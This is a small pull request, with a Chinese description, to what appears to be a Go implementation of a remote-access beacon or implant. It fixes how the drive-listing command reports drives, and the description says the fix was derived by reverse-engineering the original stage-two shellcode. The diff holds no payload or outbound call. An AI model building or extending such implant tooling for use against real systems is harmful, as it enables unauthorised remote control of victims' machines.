### PR TITLE
FIX CMD_TYPE_DRIVES BUG

### DIFF
--- a/packet/commands_windows.go
+++ b/packet/commands_windows.go
@@ -524,15 +524,16 @@ func Drives(b []byte) ([]byte, error) {
 	if err != nil {
 		return nil, err
 	}
-	var result []byte
-	i := 47
-	for bitMask > 0 {
-		if bitMask%2 == 1 {
-			result = append(result, byte(i))
-		}
-		bitMask >>= 1
-		i++
-	}
+	// var result []byte
+	// i := 47
+	// for bitMask > 0 {
+	// 	if bitMask%2 == 1 {
+	// 		result = append(result, byte(i))
+	// 	}
+	// 	bitMask >>= 1
+	// 	i++
+	// }
+	result := []byte(fmt.Sprintf("%d", bitMask))
 	return util.BytesCombine(b[0:4], result), nil
 }
 


### PR DESCRIPTION
# 修复列盘符不正确的BUG

## 修复前：
![image](https://user-images.githubusercontent.com/44094753/215304602-cc0d0e71-79e3-4135-b470-7df0768296a3.png)


## 修复后：
![image](https://user-images.githubusercontent.com/44094753/215304556-87409240-4b3e-4c11-96e0-74e21a6eaa3b.png)

## 修复依据
逆向Stage2Shellcode
![image](https://user-images.githubusercontent.com/44094753/215304622-fc7fd818-2dfc-4c26-82b6-160b6d8f43ad.png)

